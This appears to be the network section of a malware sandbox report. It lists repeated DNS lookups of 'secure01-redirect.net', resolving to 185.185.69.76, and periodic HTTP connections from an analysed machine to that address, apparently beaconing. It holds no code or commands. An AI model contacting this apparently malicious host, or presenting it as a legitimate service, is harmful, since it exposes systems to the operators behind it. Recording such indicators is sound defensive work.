Jan 28, 2022 23:37:07.318835974 CET | 80 | 49769 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:07.318934917 CET | 49769 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:07.375139952 CET | 80 | 49769 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:08.647847891 CET | 80 | 49769 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:08.649538040 CET | 49769 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:08.649596930 CET | 49769 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:08.705777884 CET | 80 | 49769 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:10.211724043 CET | 49770 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:10.268347979 CET | 80 | 49770 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:10.268496990 CET | 49770 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:10.277966022 CET | 49770 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:10.334707022 CET | 80 | 49770 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:10.334817886 CET | 49770 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:10.391747952 CET | 80 | 49770 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:12.345729113 CET | 80 | 49770 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:12.345850945 CET | 49770 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:12.345911026 CET | 49770 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:12.402575970 CET | 80 | 49770 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:14.627826929 CET | 49771 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:14.706403017 CET | 80 | 49771 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:14.706513882 CET | 49771 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:14.709347010 CET | 49771 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:14.779093027 CET | 80 | 49771 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:14.779185057 CET | 49771 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:14.849184036 CET | 80 | 49771 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:16.117796898 CET | 80 | 49771 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:16.117954969 CET | 49771 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:16.118154049 CET | 49771 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:16.187680006 CET | 80 | 49771 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:17.399497032 CET | 49773 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:17.455802917 CET | 80 | 49773 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:17.456547022 CET | 49773 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:17.458668947 CET | 49773 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:17.514766932 CET | 80 | 49773 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:17.514823914 CET | 49773 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:17.572290897 CET | 80 | 49773 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:18.890583992 CET | 80 | 49773 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:18.894428968 CET | 49773 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:18.894535065 CET | 49773 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:18.950567961 CET | 80 | 49773 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:20.200753927 CET | 49774 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:20.259144068 CET | 80 | 49774 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:20.259227991 CET | 49774 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:20.261991978 CET | 49774 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:20.318341017 CET | 80 | 49774 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:20.318430901 CET | 49774 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:20.375220060 CET | 80 | 49774 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:21.668706894 CET | 80 | 49774 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:21.668883085 CET | 49774 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:21.668941975 CET | 49774 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:21.725199938 CET | 80 | 49774 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:22.748919010 CET | 49775 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:22.806096077 CET | 80 | 49775 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:22.806251049 CET | 49775 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:22.809911013 CET | 49775 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:22.904851913 CET | 80 | 49775 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:22.905011892 CET | 49775 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:22.961323977 CET | 80 | 49775 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:24.212196112 CET | 80 | 49775 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:24.212405920 CET | 49775 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:24.212441921 CET | 49775 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:24.268726110 CET | 80 | 49775 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:25.334419966 CET | 49776 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:25.390957117 CET | 80 | 49776 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:25.391129017 CET | 49776 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:25.398463011 CET | 49776 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:25.455079079 CET | 80 | 49776 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:25.455180883 CET | 49776 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:25.511708021 CET | 80 | 49776 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:26.758080006 CET | 80 | 49776 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:26.758199930 CET | 49776 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:26.758239031 CET | 49776 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:26.814860106 CET | 80 | 49776 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:29.194413900 CET | 49779 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:29.260422945 CET | 80 | 49779 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:29.260504961 CET | 49779 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:29.263305902 CET | 49779 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:29.329282999 CET | 80 | 49779 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:29.329364061 CET | 49779 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:29.395251036 CET | 80 | 49779 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:30.738581896 CET | 80 | 49779 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:30.738667965 CET | 49779 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:30.738718033 CET | 49779 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:30.804800987 CET | 80 | 49779 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:33.891877890 CET | 49780 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:33.958883047 CET | 80 | 49780 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:33.959032059 CET | 49780 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:33.962521076 CET | 49780 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:34.028996944 CET | 80 | 49780 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:34.029126883 CET | 49780 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:34.095474958 CET | 80 | 49780 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:35.373624086 CET | 80 | 49780 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:35.373718977 CET | 49780 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:35.373763084 CET | 49780 | 80 | 192.168.2.6 | 185.185.69.76
Jan 28, 2022 23:37:35.440495968 CET | 80 | 49780 | 185.185.69.76 | 192.168.2.6
Jan 28, 2022 23:37:36.518332958 CET | 49782 | 80 | 192.168.2.6 | 185.185.69.76
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 23:37:06.902832985 CET | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:07.189394951 CET | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:09.895837069 CET | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:10.210237026 CET | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:14.289541960 CET | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:14.308670044 CET | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:17.111224890 CET | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:17.397923946 CET | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:19.890825033 CET | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:20.199086905 CET | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:22.728606939 CET | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:22.747112989 CET | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:25.315891027 CET | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:25.332844019 CET | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:29.174689054 CET | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:29.193221092 CET | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:33.873795986 CET | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:33.890588045 CET | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:36.492325068 CET | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:36.512134075 CET | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:39.327147961 CET | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:39.343832970 CET | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:41.614988089 CET | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:41.901705027 CET | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:44.693382025 CET | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:44.712313890 CET | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:50.316968918 CET | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:50.335726976 CET | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:54.998337984 CET | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:55.016972065 CET | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:37:59.082956076 CET | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:37:59.388312101 CET | 53 | 53799 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:02.078545094 CET | 64021 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:02.097598076 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:06.313935041 CET | 56327 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:06.332571983 CET | 53 | 56327 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:09.962450027 CET | 62055 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:09.979409933 CET | 53 | 62055 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:12.312206030 CET | 61249 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:12.639857054 CET | 53 | 61249 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:16.923599005 CET | 65252 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:17.208503962 CET | 53 | 65252 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:20.080570936 CET | 64367 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:20.099165916 CET | 53 | 64367 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:23.150827885 CET | 60211 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:23.169887066 CET | 53 | 60211 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:27.394073009 CET | 55180 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:27.411124945 CET | 53 | 55180 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:30.973910093 CET | 58721 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:30.992604017 CET | 53 | 58721 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:33.417038918 CET | 57691 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:33.435640097 CET | 53 | 57691 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:37.043313980 CET | 59489 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:37.061940908 CET | 53 | 59489 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:40.043288946 CET | 64022 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:40.062098980 CET | 53 | 64022 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:42.351895094 CET | 57193 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:42.370554924 CET | 53 | 57193 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:45.427057981 CET | 50248 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:45.444062948 CET | 53 | 50248 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:49.258750916 CET | 60429 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:49.277318954 CET | 53 | 60429 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:52.224076986 CET | 60345 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:52.241295099 CET | 53 | 60345 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:54.707078934 CET | 58730 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:54.726234913 CET | 53 | 58730 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:57.165729046 CET | 57226 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:57.182893038 CET | 53 | 57226 | 8.8.8.8 | 192.168.2.6
Jan 28, 2022 23:38:59.576981068 CET | 57880 | 53 | 192.168.2.6 | 8.8.8.8
Jan 28, 2022 23:38:59.887764931 CET | 53 | 57880 | 8.8.8.8 | 192.168.2.6
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
              Jan 28, 2022 23:37:06.902832985 CET | 192.168.2.6 | 8.8.8.8 | 0x1758 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:09.895837069 CET | 192.168.2.6 | 8.8.8.8 | 0x8e74 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:14.289541960 CET | 192.168.2.6 | 8.8.8.8 | 0xce34 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:17.111224890 CET | 192.168.2.6 | 8.8.8.8 | 0xc12f | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:19.890825033 CET | 192.168.2.6 | 8.8.8.8 | 0x6ed9 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:22.728606939 CET | 192.168.2.6 | 8.8.8.8 | 0x7b58 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:25.315891027 CET | 192.168.2.6 | 8.8.8.8 | 0xb9e4 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:29.174689054 CET | 192.168.2.6 | 8.8.8.8 | 0xb594 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:33.873795986 CET | 192.168.2.6 | 8.8.8.8 | 0x13c8 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:36.492325068 CET | 192.168.2.6 | 8.8.8.8 | 0x439f | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:39.327147961 CET | 192.168.2.6 | 8.8.8.8 | 0x8600 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:41.614988089 CET | 192.168.2.6 | 8.8.8.8 | 0x5bee | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:44.693382025 CET | 192.168.2.6 | 8.8.8.8 | 0xf87f | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:50.316968918 CET | 192.168.2.6 | 8.8.8.8 | 0x112b | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:54.998337984 CET | 192.168.2.6 | 8.8.8.8 | 0xf5d8 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:59.082956076 CET | 192.168.2.6 | 8.8.8.8 | 0x4e06 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:02.078545094 CET | 192.168.2.6 | 8.8.8.8 | 0x7c80 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:06.313935041 CET | 192.168.2.6 | 8.8.8.8 | 0x35e8 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:09.962450027 CET | 192.168.2.6 | 8.8.8.8 | 0x557b | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:12.312206030 CET | 192.168.2.6 | 8.8.8.8 | 0xb6ca | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:16.923599005 CET | 192.168.2.6 | 8.8.8.8 | 0x4b7b | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:20.080570936 CET | 192.168.2.6 | 8.8.8.8 | 0x749f | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:23.150827885 CET | 192.168.2.6 | 8.8.8.8 | 0x5a17 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:27.394073009 CET | 192.168.2.6 | 8.8.8.8 | 0x6f6c | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:30.973910093 CET | 192.168.2.6 | 8.8.8.8 | 0x3c33 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:33.417038918 CET | 192.168.2.6 | 8.8.8.8 | 0xd1b4 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:37.043313980 CET | 192.168.2.6 | 8.8.8.8 | 0xd0d3 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:40.043288946 CET | 192.168.2.6 | 8.8.8.8 | 0x1c64 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:42.351895094 CET | 192.168.2.6 | 8.8.8.8 | 0x4aa3 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:45.427057981 CET | 192.168.2.6 | 8.8.8.8 | 0x6552 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:49.258750916 CET | 192.168.2.6 | 8.8.8.8 | 0xae82 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:52.224076986 CET | 192.168.2.6 | 8.8.8.8 | 0xdd80 | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:54.707078934 CET | 192.168.2.6 | 8.8.8.8 | 0xfd3d | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:57.165729046 CET | 192.168.2.6 | 8.8.8.8 | 0xab3c | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:59.576981068 CET | 192.168.2.6 | 8.8.8.8 | 0x719a | Standard query (0) | secure01-redirect.net | A (IP address) | IN (0x0001)
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
              Jan 28, 2022 23:37:07.189394951 CET | 8.8.8.8 | 192.168.2.6 | 0x1758 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:10.210237026 CET | 8.8.8.8 | 192.168.2.6 | 0x8e74 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:14.308670044 CET | 8.8.8.8 | 192.168.2.6 | 0xce34 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:17.397923946 CET | 8.8.8.8 | 192.168.2.6 | 0xc12f | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:20.199086905 CET | 8.8.8.8 | 192.168.2.6 | 0x6ed9 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:22.747112989 CET | 8.8.8.8 | 192.168.2.6 | 0x7b58 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:25.332844019 CET | 8.8.8.8 | 192.168.2.6 | 0xb9e4 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:29.193221092 CET | 8.8.8.8 | 192.168.2.6 | 0xb594 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:33.890588045 CET | 8.8.8.8 | 192.168.2.6 | 0x13c8 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:36.512134075 CET | 8.8.8.8 | 192.168.2.6 | 0x439f | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:39.343832970 CET | 8.8.8.8 | 192.168.2.6 | 0x8600 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:41.901705027 CET | 8.8.8.8 | 192.168.2.6 | 0x5bee | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:44.712313890 CET | 8.8.8.8 | 192.168.2.6 | 0xf87f | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:50.335726976 CET | 8.8.8.8 | 192.168.2.6 | 0x112b | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:55.016972065 CET | 8.8.8.8 | 192.168.2.6 | 0xf5d8 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:37:59.388312101 CET | 8.8.8.8 | 192.168.2.6 | 0x4e06 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:02.097598076 CET | 8.8.8.8 | 192.168.2.6 | 0x7c80 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:06.332571983 CET | 8.8.8.8 | 192.168.2.6 | 0x35e8 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:09.979409933 CET | 8.8.8.8 | 192.168.2.6 | 0x557b | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:12.639857054 CET | 8.8.8.8 | 192.168.2.6 | 0xb6ca | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:17.208503962 CET | 8.8.8.8 | 192.168.2.6 | 0x4b7b | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:20.099165916 CET | 8.8.8.8 | 192.168.2.6 | 0x749f | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:23.169887066 CET | 8.8.8.8 | 192.168.2.6 | 0x5a17 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:27.411124945 CET | 8.8.8.8 | 192.168.2.6 | 0x6f6c | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:30.992604017 CET | 8.8.8.8 | 192.168.2.6 | 0x3c33 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:33.435640097 CET | 8.8.8.8 | 192.168.2.6 | 0xd1b4 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:37.061940908 CET | 8.8.8.8 | 192.168.2.6 | 0xd0d3 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:40.062098980 CET | 8.8.8.8 | 192.168.2.6 | 0x1c64 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:42.370554924 CET | 8.8.8.8 | 192.168.2.6 | 0x4aa3 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:45.444062948 CET | 8.8.8.8 | 192.168.2.6 | 0x6552 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:49.277318954 CET | 8.8.8.8 | 192.168.2.6 | 0xae82 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:52.241295099 CET | 8.8.8.8 | 192.168.2.6 | 0xdd80 | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:54.726234913 CET | 8.8.8.8 | 192.168.2.6 | 0xfd3d | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:57.182893038 CET | 8.8.8.8 | 192.168.2.6 | 0xab3c | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              Jan 28, 2022 23:38:59.887764931 CET | 8.8.8.8 | 192.168.2.6 | 0x719a | No error (0) | secure01-redirect.net |  | 185.185.69.76 | A (IP address) | IN (0x0001)
              • secure01-redirect.net
              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
